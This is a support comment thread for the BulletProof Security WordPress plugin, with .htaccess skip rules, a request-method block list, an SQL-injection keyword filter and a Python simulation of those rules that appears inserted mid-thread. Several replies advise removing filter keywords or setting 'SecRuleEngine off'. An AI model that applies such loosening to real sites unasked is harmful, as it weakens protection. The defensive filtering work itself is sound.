BulletProof Security Comments, Questions, Problems & Wishlist

Author: AITpro Admin
Published: April 27, 2010
Updated: November 9, 2012

Categories: BulletProof Security Plugin Support

947 Comments to “BulletProof Security Comments, Questions, Problems & Wishlist”


  1. John says:

    Hi guys,

    We webmaster Prasarnmit International Programme) and have a SMF forum linking to the main WordPress site. Once we’ve activated BPS certain admin functions of SMF – such as deleting posts or moving around the admin section of SMF – return an error similar to the following:

    403 Permission Denied
    You do not have permission for this request /forum/index.php?action=deletemsg;topic=30.0;msg=71;dc49bd7d54=14959cb8d9672936c668aa0683aaeda0

    On our own website we’ve said BPS is a “must have” WP plugin and despite this problem still maintain that anyone who doesn’t install BPS must be smoking crack, but it would be really nice if we could find a solution to this problem.

    Our testing shows that activating either Root Folder .htaccess Security Mode or wp-admin Folder .htaccess Security Mode causes this error to occur.

    While we as webmasters can easily jump back and forward between the WP admin and SMF admin, our forum moderators don’t have access to WP admin.

    Any suggestions?

    • AITpro Admin says:

      Try this fix and let me know if it works. copy this .htaccess code to your root .htaccess file. Thanks.

      # SMF DeleteMessage function Query String skip
      RewriteCond %{QUERY_STRING} action=deletemsg(.*) [NC]
      RewriteRule . - [S=30]
      
      • John says:

        Thanks very much for the suggestion regarding our SMF conflicting with BPS plugin problem

        That worked perfectly. We also had other difficulties with a 403 error message in the SMF admin area – moving to features and functions invoked a similar 403 error. I modified your suggested code to:

        # SMF action=admin Query String skip
        RewriteCond %{QUERY_STRING} action=admin(.*) [NC]
        RewriteRule . - [S=30]

        And it fixed that problem with SMF conflicting with the BPS plugin problem also.

        You guys rock!!

        We haven’t had a single website we manage hacked since installing BPS – We’ll do a special write-up on BPS in the coming weeks.

        Thanks very much for solving our SMF conflicting with BPS plugin problem.

  2. Leo says:

    Hi

    I’ve installed Bullet Proof and got this message in red, in the “General Security File Checks” area of my Security Status:

    “Your Current wp-admin .htaccess File is NOT backed up yet”

    I am not particularly technically literate and don’t understand this message. Does it point to a problem that needs attention, or can I ignore it.

    Really appreciate your help,

    Leo Hawkins

    PS I’m much impressed by what I have seen of your product so far.

    • AITpro Admin says:

      Hi
      This is just a heads up alert to let you know that the file is not backed up yet so you can either back it up or just ignore the alert. If an .htaccess file did not exist in your wp-admin folder then that would be a problem. Thanks.

      • Leo says:

        Thanks for your rapid response.

        I have two observations to further this discussion:

        1] On the “BulletProof Security Status” page, in the “Activated BulletProof Security .htaccess Files” section there is this sentence: “The .htaccess file that is activated in your wp-admin folder is: XXXX [there is a file name here but I thought it best not to reproduce it on an open forum].

        This suggests that the .htaccess file does exist in the wp-admin folder.

        So this leads to my first question: Why has it not been backed up?

        My second question is: How can I back it up?

        2] On the “Edit/Upload/Download|” page, under the “File Downloads” section, there are two blue buttons: “root.htaccess backup file” and “wp-admin.htaccess backup file”

        When I click on these blue buttons all that comes is a 404 Error webpage.

        My third question: Should I see the 404 page, or is something wrong?

        many thanks for your help,

        Leo

        • AITpro Admin says:

          Yep you have an existing .htaccess file in your /wp-admin folder. Backup and Restore of the .htaccess files is done on the Backup & Restore page. Under Backup Your Currently Active .htaccess Files — Select the Backup htaccess files radio button and click the Backup Files button. The buttons you mentioned on the Edit \ Upload \ Download page are for downloading those files and you saw a 404 error message because you must enable downloading first. This is going to change in the next release of BPS and i may just decide to get rid of all the dumb download stuff in there anyway. It was a very old idea that has long since become archaic and useless. 😉 Thanks.

          • Leo says:

            Many thanks – all sorted now.

            Actually I did what you suggested first time around [the radio button for .htaccess] but seems it needed a second poke to get it to work fully.

            have a great day,

            Leo

  3. rk says:

    Ed – a quick question:
    currently I use wordpress-firewall-2 plugin on my website. I am not an wp/coding expert by any stretch, but I wondered if that was not quite enough of a protection, so in my search for extra WP security I came across your plugin.

    If I were to use your paid Pro version, should it be in addition to firewall-2 or instead of?

    Thanks!

    • AITpro Admin says:

      Well that plugin has not been updated in about a year so maybe it has been abandoned? I took a look at it many months ago and i believe it does a couple of things that BPS (free version) doesn’t do like logging bad behavior, but as far as security protection goes BPS (free version) is overriding this plugin’s security capabilities and does quite a bit more. The first release of BPS Pro is primarily covering all the basics of website security with some advanced tools. So honestly you really can’t compare firewall 2 to BPS Pro. It would be like comparing a shoe to a shoe factory. 😉 Lots more to come in future releases of BPS Pro too, but i had to get something out the door just to get started. BPS Pro is a few months worth of coding work and a very solid foundation to build from. I am really excited about what is coming in future versions and believe this will put BPS Pro in a league all by itself. 😉 Thanks.

  4. Dean Ramsden says:

    I just purchased the BulletProof Security Pro Plugin, and was impressed when Ed offered to set it up for me. This led to a minor installation snafu due to unexpected issues on my server, which Ed resolved within a few hours. I just want to publicly thank Ed for what I consider customer service above and beyond the norm. I’m also very happy with the plugin, and will be educating myself as to how it functions over the next few weeks. For small business owners like myself the BPS Pro plugin seems essential to my working sites, because we all know it is far better to be safe than to clean up after a site has been hacked. I encourage anyone on the fence about the purchase of the Pro plugin, to take the jump. Because we pay not only for a good product with great coding, but also for the customer support that lies beneath it. Great job this morning, Ed. Thank you very much for all your work.

    • AITpro Admin says:

      Hi,

      Thanks for the awesome kudos!

      And thanks again for letting me spend so much extra time exploring, gathering and documenting the new information about what your web host is now offering in regards to php.ini.
      Best Regards,
      Ed

  5. NaTrna says:

    Hi,
    We tried to add a subdomain to our site. When we viewed the main site it showed 500 internal server error. I googled for help, as well as emailed our host. Up until this comment the only thing I have found was renaming the .htaccess file. I tried, but do not know if it was correct. We can’t login to our blog. Is there something we can do from c/panel to get our blog back up. I can find the bps backup folder in c/panel, but don’t know what to do with it. We are not “code” savvy but i can find my way around c/panel’s file manager. Thanks for any help.

    NaTrna

    • AITpro Admin says:

      Ok so i am going to assume that you installed BPS, created a custom permalink structure under WordPress Permalinks and then activated BulletProof Modes. To get into your main site you will need to download and use the default.htaccess file to get back into your WordPress Dashboard. You can download it from this folder /wp-content/plugins/bulletproof-security/admin/htaccess. Once you have downloaded the default.htaccess file then upload it to your root folder (the same folder that the wp-config.php file is in for your main site) for your main site and rename the file to .htaccess (removing default from default.htaccess). You should now be able to log into your WP Dashboard. Thanks.

  6. Paolo says:

    Hi and thank you for the great plugin.

    I found out that when I enable the BPS .htaccess main file it prevents me from using certain pages of phpMyAdmin. Browsing the tables is fine. Using pages like tbl_change.php or sql.php is not working anymore. The installation of PMA, not the plugin, the full version, is under a subdir and WP runs from the root dir of the website.

    Hope you can help me.

    Thanks in advance.

    • AITpro Admin says:

      Weird. I use phpMyAdmin on a daily basis and also a plugin that connects to the MySQL database from within the WP Dashboard and i have never had an issue or problem. I can’t think of how BPS would have anything to do with phpMyAdmin. “PMA….is under a sub directory…” Is this for a development site that you have on your local system / computer, ie XAMPP? This is the only logical thing i can think of where BPS could possibly be causing some kind of an issue. Honestly i can’t really think of how there would be an issue even on a local XAMPP set up either. Can you give me some more details? Also I see Amazon has a number of different DB options. I am not familiar with them at all so be as specific as possible about what type of DB setup you have with them if the issue is with a live or production site on their servers. Thanks.

      PS cool site! I have not done anything with DAZ in a long, long time. 😉

      • Paolo says:

        Thanks!
        The site is running ubuntu with MySql, the version of PMA is the latest, 3.4.3.2. I tested the condition step by step.

        – No BPS, PMA works
        – Enable just the master .htaccess, PMA doesn’t work
        – Revert back to my original .htaccess, PMA works again.

        The behavior is for the http://www.preta3d.com site, it’s not a local configuration, that’s the live, Apache-managed site.

        Hope this helps.

        • AITpro Admin says:

          Ok well i can’t seem to recreate the problem on my sites and host server so I’m not exactly sure what to tell you here. PMA works fine on my host when testing tbl_change.php and sql.php. You could try and comment out the Query String filters one by one in the BPS root .htaccess file to find out which filter is blocking what is seen as a threat or hacking attempt. Overall this is an area of the .htaccess master file that i would not consider changing as a regular modification that i would distribute in a future version of BPS so if you need to customize the .htaccess file filters for your specific needs then just try the commenting out approach. Keep in mind that each filter you remove will open up another possible vulnerability on your website. 😉 Another approach could be to create a custom htaccess skip rule for your site needs. Take a look at the skip rules in the root .htaccess file and maybe one of those methods will work for your needs. You would have to create a new skip rule based on your specific variables, uri, condition, query string, etc.

          I came across this info in a Google search and this is the direction you should be looking at to correct the issue for your specific site. This is explaining how you would fix this issue at the Master httpd.conf level so if you wanted to do this at the .htaccess level then the same general idea would apply. You basically want to turn off / not include / skip the root htaccess security filters from being applied to ONLY the /phpadmin folder.

          “I suddenly got this error when trying to edit a table record using phpMyAdmin.
          To fix this, add this to your /etc/httpd/conf/httpd.conf, inside the block that starts with (the path of the root of your Apache directory tree):

          SecRuleEngine off

          Alternatively, you can write a separate entry only for the directory where you have installed your phpMyAdmin (/var/www/html/phpadmin in my case, but probably different for you):

          <Directory "/var/www/html/phpadmin">
          SecRuleEngine off
          </Directory>

          Then restart Apache (/etc/init.d/httpd restart) and all should be ok. ”

          The above information in quotes was found by googling.
          Thanks.

          • Paolo says:

            Thank you very much for the quick and detailed answer. I added a skip rule for the path where PMA is installed and everything works perfectly.
            Fantastic products and fantastic support!

            Thanks a million.

          • AITpro Admin says:

            Excellent and Well Done!!! It’s always a pleasure to be working with a technically savvy person. 🙂 Thank you and ur welcome.

  7. Chris says:

    Thanks for great plugin. Am using it on several sites and have all options/modes running. Have green indicators that everything is working as it should. My question is, when I use ismyblogworking.com and check my sites that have BPS installed, it returns errors that HTTP HEAD REQUESTS are not enabled or something like that.

    Is this a result of BPS settings in my htaccess files? Is it “bad” and do I need to fix or modify the BPS created .htaccess files to enable them?

    Thanks for the help.
    Chris

    • AITpro Admin says:

      ha ha ha. Yeah i checked my site and it says “Your blog is broken”. LOL Really that’s funny I’m logged into my blog right now. LOL The “error” is “Your blog doesn’t support HTTP HEAD requests (403).”. Exactly what i want thank you very much. 🙂 If you would like to allow HEAD requests to your site(s). Then just remove the HEAD request from:

      # FILTER REQUEST METHODS
      RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC]
      RewriteRule ^(.*)$ - [F,L]

      “The HEAD method is identical to GET except that the server MUST NOT return a message-body in the response. The metainformation contained in the HTTP headers in response to a HEAD request SHOULD be identical to the information sent in response to a GET request. This method can be used for obtaining metainformation about the entity implied by the request without transferring the entity-body itself. This method is often used for testing hypertext links for validity, accessibility, and recent modification.”

      Well that sounds like something you would want to have allowed right?
      Yep HEAD is Forbidden in the Root .htaccess file. It is more of just a nuisance blocker than anything else.
      It does not really serve a security purpose. Just filters out cloaked crap bots, crap harvesters, crap spiders, etc. traffic.
      This does not necessarily do anything to stop them. It is more of an F YOU to these automated crap crawlers! LOL
      Bottom Line >>> The server understands the request, but is refusing to fulfill it.
      Thanks,
      Ed

      • Chris says:

        Good to hear and thanks for the reply. I’m going to just leave it as is since that sounds like good advice to avoid the crap crawlers as you say! You have any suggestions for better online tools to check websites with instead of the one I found? Was looking around, but most are pretty basic.

        thanks again,
        Chris

        • AITpro Admin says:

          That site checker seemed pretty good, but to be honest with you I do all of that stuff manually. So nope I don’t know of any other good site checkers. Sorry. Thanks.

  8. I am testing out your plugin and have a problem with the plugin Visitor Maps and Who’s Online by Mike Challis it stops showing the map images behind the pins of where people are. I believe it is a simple fix but don’t know the htaccess file well enough to say allow something in this or that directory.

    • AITpro Admin says:

      ok try adding an .htaccess skip rule to your root .htaccess file. Let me know if this takes care of it. Thanks.

      # Visitor Maps and Who's Online
      RewriteCond %{REQUEST_URI} ^/wp-content/plugins/visitor-maps/ [NC]
      RewriteRule . - [S=30]
      
      • I tried that and as soon as I make bullet proof active there is no background images.
        I do not know if this is related but the server log shows

        [Thu Aug 18 08:59:57 2011] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.

        • AITpro Admin says:

          Is your WordPress site a root site or a subfolder site? Usually this non-regex error is due to having [NC] added after -f , which is not valid, but it could be another problem with your .htaccess coding. I will install and test this plugin and then post the fix back here. Thanks.

          *** UPDATE >>> FIX FOR Visitor Maps and Who’s Online by Mike Challis ***
          Remove “set” from your SQL Injection filter in your Root .htaccess file as shown below. In the do wo_map= query string, one of the variables is “offset” This is being interpreted as an external query threat, but is obviously not. Removing “set” from the filtered / blocked SQL filtered commands / words is fine and will not leave your site any less secure.

          RewriteCond %{QUERY_STRING} ^.*(execute|exec|sp_executesql|request|select|insert|union|declare|drop|delete|create|alter|update|order|char|cast|convert|meta|script|truncate).* [NC] 
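The three rules quoted in this thread (the SMF and Visitor Maps skip rules, the FILTER REQUEST METHODS block, and the SQL Injection query string filter with and without “set”) can be checked against sample requests without touching a live server. The following is an added simulation written for this page, not BPS plugin code: it re-expresses each RewriteCond as a Python regex (Apache matches a CondPattern anywhere in the test string, so re.search() is used, and [NC] becomes re.IGNORECASE). Two simplifications are assumptions: a matching skip rule short-circuits the whole filter chain instead of skipping exactly 30 rules as [S=30] does, and the filters are evaluated in the order skip rules, request method, query string. The sample requests are constructed for illustration.

```python
import re
from typing import Dict, List, Optional, Tuple

# Keywords from the SQL Injection query string filter quoted in this thread,
# minus "set" (which the fix above removes).
SQL_TERMS = ("execute|exec|sp_executesql|request|select|insert|union|declare|drop|"
             "delete|create|alter|update|order|char|cast|convert|meta|script|truncate")

# The filter as it was before the fix, with "set" still in the list.
SQL_FILTER_WITH_SET = re.compile(r"^.*(" + SQL_TERMS + r"|set).*", re.IGNORECASE)
# The filter after the fix from this thread: "set" removed.
SQL_FILTER_WITHOUT_SET = re.compile(r"^.*(" + SQL_TERMS + r").*", re.IGNORECASE)

# # FILTER REQUEST METHODS (RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC])
REQUEST_METHOD_FILTER = re.compile(r"^(HEAD|TRACE|DELETE|TRACK)", re.IGNORECASE)

# Skip rules posted in this thread as (server variable, CondPattern) pairs.
# Assumption: a match bypasses every filter below, a simplification of [S=30].
SKIP_RULES: List[Tuple[str, re.Pattern]] = [
    ("REQUEST_URI", re.compile(r"^/wp-content/plugins/visitor-maps/", re.IGNORECASE)),
    ("QUERY_STRING", re.compile(r"action=deletemsg(.*)", re.IGNORECASE)),
    ("QUERY_STRING", re.compile(r"action=admin(.*)", re.IGNORECASE)),
]


def matched_term(filter_re: re.Pattern, query_string: str) -> Optional[str]:
    """Return the filter keyword that fired for this query string, or None.

    The pattern is ^.*(keywords).* with no word boundaries, so a keyword also
    matches as a substring of a longer parameter name, e.g. "set" inside "offset".
    """
    m = filter_re.search(query_string)
    return m.group(1).lower() if m else None


def evaluate(method: str, uri: str, query_string: str,
             sql_filter: re.Pattern = SQL_FILTER_WITH_SET,
             skip_rules: Optional[List[Tuple[str, re.Pattern]]] = None) -> Tuple[str, str]:
    """Simulate the rule chain for one request.

    Returns ("allow" | "403", reason). Assumed order: skip rules, then the
    request method filter, then the SQL Injection query string filter.
    """
    env: Dict[str, str] = {"REQUEST_URI": uri, "QUERY_STRING": query_string}
    for variable, pattern in (SKIP_RULES if skip_rules is None else skip_rules):
        if pattern.search(env[variable]):
            return "allow", f"skip rule matched {variable}"
    if REQUEST_METHOD_FILTER.search(method):
        return "403", "FILTER REQUEST METHODS"
    term = matched_term(sql_filter, query_string)
    if term is not None:
        return "403", f"SQL Injection filter matched '{term}'"
    return "allow", "no filter matched"


if __name__ == "__main__":
    # Constructed sample requests modelled on the reports in this thread.
    samples = [
        ("HEAD", "/", ""),
        ("GET", "/index.php", "do=wo_map&offset=10"),
        ("GET", "/forum/index.php", "action=deletemsg;topic=30.0;msg=71"),
        ("GET", "/wp-content/plugins/visitor-maps/getmap.php", "do=wo_map&offset=10"),
    ]
    for method, uri, qs in samples:
        print(f"{method} {uri}?{qs}")
        print("  with set, no skip rules:   ", evaluate(method, uri, qs, SQL_FILTER_WITH_SET, []))
        print("  with set, skip rules:      ", evaluate(method, uri, qs, SQL_FILTER_WITH_SET))
        print("  without set, skip rules:   ", evaluate(method, uri, qs, SQL_FILTER_WITHOUT_SET))
```

Running it shows why the Visitor Maps request is refused: matched_term() reports “set” for the query string do=wo_map&offset=10, so the only thing the filter saw was the substring of “offset”. The same function reports “delete” for the SMF action=deletemsg query string, which is what the skip rule in comment 1 works around. Before removing a keyword, a defender can use this kind of dry run on the site’s real query strings to confirm which term is firing rather than loosening the whole filter.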
          
  9. Rick Troup says:

    Good Morning MST,

    I have been using BPS for about 4 months. First two months everything was smooth running. Then I transferred to a new hosting company. They transferred all of my cpanel accounts for me. I changed passwords to everything. Within 2 weeks after transfer I lost both sites to something called “silence is golden” but all of my data files were deleted, including my backup files for everything. I asked my new host for a backup and they refused to give it to me. I put 8 months into my blogs only to lose everything in an instant. I am building my own servers and will host my own websites from here on out.
    I do not have BPS PRO installed, would that have prevented this attack?
    What can you recommend that I do to secure my servers from these kinds of attacks?
    I am considering using cpanel on my new servers, is cpanel part of the problem?
    Did my new hosting company do this to me?

    I really love BPS and will be upgrading to PRO after I move to my own servers. And I really, really appreciate all of the hard work and time into BPS. It is clearly the best supported security solution on the internet to date!

    Thank-You for Your Time and Consideration,
    Rick Troup
    Customer for Life!

    • AITpro Admin says:

      Hello Rick,
      Silence is golden is a term that WordPress uses. If you open the /wp-content/index.php you will see that phrase in that file. What may have happened is that your MySQL databases were not set up correctly or you were not able to connect to your MySQL database after the migration to the new web host. You should double check with both your old host and new host to see if you have an existing database somewhere — it will contain all of your data. Also i hate to say this after the fact, but you should also have your own backup disaster recovery plan in place. I recommend using Xcloner. It will back up all of your files and your database and zip it for you to download to your computer.

      I don’t think that this was a hack at all and maybe you can still recover your data from a database that exists somewhere hopefully. Did you make a copy of it? MySQL dump, etc? Did your new host make a copy / dump of your old database? Does your old host still have a copy of your database? Check into all these possibilities before giving up.
      cpanel is secure as long as it is set up correctly and secured correctly just like anything else regarding website security. 😉

      Thanks,
      Ed

      • Rick Troup says:

        Hi Ed,
        Hope your day is going well.
        You are right about backups, I have learned a very hard lesson and have been spanked hard for it. I just ran Exploit Scanner on my last WP site and there were 110 Level Severe Malware code on my website. Moderate Level 582. Every Plugin, except BPS, had malware in it. For the last eight months I had put together 36 websites, scripts and programs purchased online and WP sites. I have 1 WP website left and it is riddled with malware. Eight Months of Hard work, gone in a matter of weeks.
        Backups would also have this malware in it, how do I remove this malware from the backup file I have for my last WP site? I really appreciate your help and suggestions, it is a breath of fresh air.
        Why does WP.org allow so many plugins with malicious code?
        Thanks for your great security package and all of your help.
        Thank-You for Your Time and Consideration,
        Rick Troup

        • AITpro Admin says:

          Well just because Exploit Scanner is reporting things as possibly bad does not mean that they are really bad. I like Exploit Scanner a lot, but to be honest with you if someone is not fairly experienced with being able to distinguish good code from bad code then Exploit Scanner will just freak a non-coder out. What Exploit Scanner is designed to do is look at all coding that could possibly be bad that you should then look into further. It does not tell you what is actually good or bad. That would be either very difficult to do or impossible to do. The reason for this is code is code. It is the same whether it is used for good purposes or bad purposes. A good analogy is that a gun in the hands of a good person is a good thing, but a gun in the hands of a bad person is going to be a bad thing. The gun is just a gun. So when Exploit Scanner is telling you that it found code that is possibly bad you will then need to be able to look at the code and see what it it is doing. Is it doing something good or is it doing something bad?

          A lot of plugins use php functions such as base64_decode for legitimate reasons. The php base64_decode function is very commonly used by hackers to decode code that are trying to hide from being searchable. Just because a plugin is using this standard php function does not mean that it is doing something bad. You have to look at what the code is doing and then determine if it is doing something good or doing something bad.
          Thanks,
          Ed

  10. Mike says:

    hello

    I installed your Bullet Proof Security wordpress plugin and is fantastic

    Can your plugin or the settings in the plugin affect Google Analytics data measurement?
    My google analytics has stopped measuring data

    I look forward to your reply

    Thank you

    Regards

    Mike

    • AITpro Admin says:

      hi Mike,
      Glad you’re diggin it. 😉 Nope BPS should not affect Google Analytics in any way. Are you talking about a GA plugin by any chance? BPS could be blocking a GA plugin so let me know if this is the issue. One thing that possibly could have affected your traffic would be if you changed your custom permalink structure, but WordPress should handle this URL rewrite seamlessly so I doubt that would be the cause for a significant traffic drop, but you should create a Google Webmaster account, if you don’t have one already, and check if you have a high amount of 404 errors or any other errors going on.
      Thanks,
      Ed

  11. Carlos says:

    Hi,

    I’m not a tech person, and have been using BulletProof Security in different environments with no problems. However, we’ve recently changed our site to another host and started having problems: we can’t login to WP, and receive a blank page after that (we don’t have Secure WordPress, and the same version of the site still works on our previous host).

    I’m guessing if BulletProof Security may have something to do with this issue, as the new host runs LiteSpeed and Percona.

    What do you think?

    Thanks,
    Carlos

    • AITpro Admin says:

      Gonna go over some basic checks first. If you have already done all this stuff then disregard it. I assume you did a migration of WordPress to your new host correct? WordPress has a post somewhere in the Codex that has step by step instructions on this if not. Or possibly you have installed a new WP site and DB and imported your MySQL database data from the old host to the new database. So assuming you have done the migration or import then have you checked to make sure your wp-config.php file has the correct DB HOST name, USER name, DB Password, etc? So if all of that stuff is good then the next thing to check would be to manually look at the .htaccess files to make sure the RewriteBase and RewriteRule are correct for this site. Download the .htaccess file that is in the root of your migrated site and make sure that the RewriteBase and RewriteRule are correct. I don’t think there would be any problems using .htaccess with LS and Perc. Thanks.

  12. atom says:

    started a new comment thread since i couldn’t reply to your last comment (too many nested comments i’m guessing)

    Ed said…
    “Blame? I hope you didn’t think i was making you wrong about the WP set up you are using. ”

    no! not at all! i just have a habit of not making things clear enough, so it was me i blamed 🙂

    so right now WP is in home/usr/public_html/wp

    ideally what i want to do is have WP in home/usr/public_html – solves the problems with having 2 htaccess files, being able to use BPS AM mode and BPS complaining that the rules for WPTC are missing, which they aren’t – they’re just not in the htaccess BPS expects

    i have other directories i need WP to ignore, so i guess i would have to dump these in a sub-domain, like home/usr/public_html2 ??? is that ok to do that? seemed to work ok in testing

    so now i’d have “12bytes.org” which points to /public_html and “files.12bytes.org” which points to /public_html2 or /files or whatever

    the WP plugin i’m using to monitor downloads would need to monitor a directory on the sub-domain, which it can’t, so i can either hack it (not likely since my php skills suck) or dump it and replace it with a non-WP related script (more likely)

    so i guess what i’m asking is… does this sound like the best way to handle my situation?

    • AITpro Admin says:

      Yep I agree that you should migrate your site to the root. This is really quick and simple to do as you probably already know and yeah it makes everything now and in the future much less complex to deal with. Simpler is pretty much always better. 😉 WP has a good post about this on their site and i seem to remember that moving the files from a CP File Manager made the whole migration take about 10 minutes. So what is puzzling to me is why is WP seeing these other directories that you want to have ignored? WP is a self contained web app and it is designed to look for only folders and files that are part of WP. So if you had folder names or file names that WP looks at or into then yeah i can see that they could conflict somehow. Ideally your structure should have all individual sites in their own folders with the exception of your root site. /site1, /site2, /site3 and the same would apply with having other platforms like if you have a forum app or ecommerce store app. /forum, /store. So yep looking at what you posted then you would create a separate folder called /files, or you could even name it /files.12bytes.org; that is entirely up to you. What i am wondering is if you are doing any DNS stuff in your CP. I have found that this is also problematic so i like to stick to doing this in the actual folder structure and not doing anything in the CP with DNS. So i am assuming that the site called files.12bytes.org is actually a separate / additional installation of WordPress correct? If not, then i’m not entirely sure what you are doing with that.

      I’m still really perplexed that the download monitoring plugin cannot monitor anything or anywhere you want it to be monitoring downloads. That would be terrible coding work if it was hard coded to not allow you to choose / specify the location to monitor. Are you absolutely sure you cannot choose / specify a location to monitor downloads? If it does not have this option you can just add it yourself and this would not require any advanced PHP expertise. You would just look at the coding of the plugin, find out where the location is set to monitor and then use that variable or function in a form you create or add onto an existing form that the plugin already has. I do this all the time with WP plugins that i’m using. If i want more options i just add them. So basically your form field would just be an input field that was blank so that you could enter the location you want in the form field. Hopefully this plugin is using the WordPress Settings API to save options to the database. Then you just need to add another option for this form field to be saved to your DB. If this plugin is not using the WP Settings API then this could be a pain in the ass thing that you won’t want to bother with. What is the name of the download monitoring plugin? I’ll take a look at it and tell you what your options are. Thanks.

      • atom says:

        thanks for the detailed reply Ed – here’s my followup…

        “So what is puzzling to me is why is WP seeing these other directories that you want to have ignored?”

        when i had WP in the public_html root, i also had other folders there. my site is a software site and i used these other folders to store my downloads and other files related to them, so this is their only relationship to WP (it’s not a 2nd WP install). i was running into very strange issues where i was unable to download the files if a folder in the directory structure for the file name had certain characters in the name, or an underscore (and i’m talking alphanumeric chars – nothing strange)

        i did a bunch of searching about this and found out it’s apparently a known issue – WP seems to “see” these foreign directories and it can cause problems – at least this is my impression from my research

        the downloads are handled via the WP plug ‘WordPress Download Monitor’ (http://wordpress.org/extend/plugins/download-monitor/) and i have it configured to redirect the actual path to a friendly path in htaccess…

        RewriteRule ^dlfiles/([^/]+)$ http://12bytes.org/wp/wp-content/plugins/download-monitor/download.php?id=$1 [L]

        the actual path is public_html/soft/apps/[3 letter app name]/[file name]

        the WP path is public_html/wp

        i tried the other day to create a sub domain – files.12bytes.org – in a second public_html dir (public_html2) and, as a test, i put a file in there and tried to set the path in the download plug and, upon saving it, it strips the sub-domain, reverting back to 12bytes.org

        i’m not doing anything in cPanel with DNS, though i am using the CloudFlare CDN and i set the DNS server at Dynadot.

        so i think what i’ll do at this point is try another download monitor plugin, re-add the sub-domain and test again. maybe i did something wrong when i created the sub since i really don’t know what i’m doing. i didn’t add any redirects or anything – just created the domain and tried to use it. my browser could read a text file in the sub-domain, so i figured it was good to go.

        • AITpro Admin says:

          Well it looks like you're on top of it. I looked around at download monitoring plugins and i looked at this plugin specifically figuring that this was the plugin you were using. It looks like there are a fair amount of problems / issues going on with this plugin, but overall it looks pretty good. Probably just needs some extra coding work to customize it for your site then. hmm second public_html2 directory? Never heard of that. Maybe that is what is going wrong here. There is only one root directory for each hosting account and in your case it is named public_html. So if you wanted a subdomain site all you would have to do is create a folder called /files.12bytes.org in your root public_html folder. But then normally you would actually do another installation of WordPress in this folder because this would be another completely separate site. Then you would just add the Site URL as files.12bytes.org in the WordPress General Settings page for this subdomain site. It only takes 1 hour to install a new WordPress site, configure it and install all your plugins so maybe you should just go this easy route and make your life a whole lot simpler. You can reuse your exact same theme in the new site so they would be completely seamless and let’s say all you were really using the new site for was downloading then you would just make it appear like it is just a designated download page when in fact it is a separate site. This could also allow you to make it much more secure than your main site if you want to make downloading much more secure. Sometimes doing this method is better. I’m actually doing something pretty much like that on my sites. I have 2 separate sites that look almost identical and that share a common DHTML menu for my purposes and i have a lot of extra security coding written all over the place for my main site because it is handling the sensitive stuff where my blog is just an explosion of words. LOL Any way it may seem like this will mean more work for you, but you know how quick it is to put together a new site and like i said if it is only serving one purpose to handle downloads right now … then you can always add more stuff to it later, but this should solve all your problems. If the download monitor software is installed on this site and all your downloads are actually stored on this site then it should work smooth as butter right? 😉

  13. atom says:

    — WP in subfolder confusion —

    hi! still haven’t figured this out even after reading relevant portions of the docs…

    i have a single site installed in a sub-directory
    W3TC is installed – it puts its rules in the site root .htaccess (public_html)
    BPS puts its rules in /wp/.htaccess

    with this config, BPS complains that W3TC is activated, but the rules are missing

    my WP address is http://12bytes.org/wp
    my site uri is http://12bytes.org

    in BPS > System Info, my install is listed as a root installation — i don’t understand why this is…

    Website Root Folder: http://12bytes.org/wp
    Document Root Path: /home/thisusr/public_html
    WP ABSPATH: /home/thisusr/public_html/wp/
    WordPress Installation Folder: /
    WordPress Installation Type: Root Folder Installation

    • AITpro Admin says:

      BPS determines if your site is a Root Installation or Subfolder installation from the WP site information you have added under your WordPress General Settings. If you have done anything unusual like moving / having WordPress in its own folder or any of the other strange and problematic WP folder move / redirect methods then BPS will not be able to see where WP is really installed. So what does your Site URL path show under General Settings? Does it show /wp in the path? BPS is seeing that /wp does not really exist in the “true” path for this site / folder. Typically when you see the W3TC error you just need to click the Redeploy link that BPS displays in the error message, but you obviously have some odd path issues going on with this site so i wonder where W3TC would add those rules to. So i need more info on why your site is being seen as a Root installation by WordPress and thus by BPS. Thanks.

      • atom says:

        before trying to troubleshoot this issue, let’s see if i can’t take a different approach…

        i read some of what you told others regarding having WP in a sub-directory and how this can be problematic. the sole reason i did this is because i have other directories in / that i need WP to ignore and having those directories along with WP in / was causing weird issues.

        might you know, or could you point me to information on how i can have WP completely ignore specified directories?

        i would much rather have WP in root

        • AITpro Admin says:

          AHA. Boy I’m getting good at spotting this issue. LOL Well really all this means is that you are going to have to do manual editing and uploading of your .htaccess files instead of using AutoMagic and activating BulletProof Modes. You just need to put .htaccess files where they need to be manually via FTP or your CP. So you just want to take the approach of forgetting about BPS automation and just do everything manually instead. If you post the details of where everything is located then i can tell you what manual editing will need to be done to the .htaccess files and where you will need to add them manually. Thanks.

          • atom says:

            i think one of us misunderstood the other…
            given my less than stellar track record in this department, i think i know who’s to blame 🙂

            maybe i didn’t explain well however…

            i’d rather make things easy and use the BPS AM mode and stick WP back in public_html, instead of a sub dir., and have one primary htaccess. my problem though is convincing WP to ignore other directories along side it in public_html – for instance i have software that can be downloaded in public_html/soft/apps and when i had WP in pub_h before, it caused weird problems with these other directories.

            i tried setting up a subdomain to put these other dir’s in, but that idea was a failure as well because the WP plugin i use to track downloads apparently doesn’t want to deal with a subdomain

          • AITpro Admin says:

            Blame? I hope you didn’t think i was making you wrong about the WP set up you are using. If it sounded that way then i apologize. 😉 Ok so let’s look at the best possible options then. I was actually using the “having WordPress in its own directory” thing many years ago and i ended up running into tons of problems so i just migrated the site to another folder. Yep WordPress in the root folder of a hosting account does not play nice sometimes with other web apps that are also in the root folder of a hosting account. So when you say subdomain I assume you are saying having a folder off of the hosting account root folder such as /public_html/some-site.com where WordPress is installed in that folder? correct? I’m not 100% sure if you are saying here that you have tried putting / migrating the WordPress site to a subfolder instead of the root of your hosting account. It appears that you are saying you’ve tried that and then you are left with the problem of the plugin that is tracking downloads will not work from a subfolder. This seems a bit odd to me. Any way in my opinion you should have your WordPress site in its own folder so migrating it to a folder like /public_html/some-site.com would be what I would do and then I would make the plugin that is not working work. If that took rewriting the code then I would do that. Obviously this is not going to work for non-coders, but there must be a way to make the plugin work from a subfolder with some sort of option setting in the plugin itself. It really should automatically work from a subfolder so that is the real problem that you should take care of or make work first. Personally I think you may be adding additional complications to compensate for this plugin problem so I would put things where they should be “naturally” and then tackle the isolated plugin and any other problems individually. Thanks.

  14. Chris J says:

    Have new WP installation for a client with latest download 3.2.1 and have installed BPS plugin.

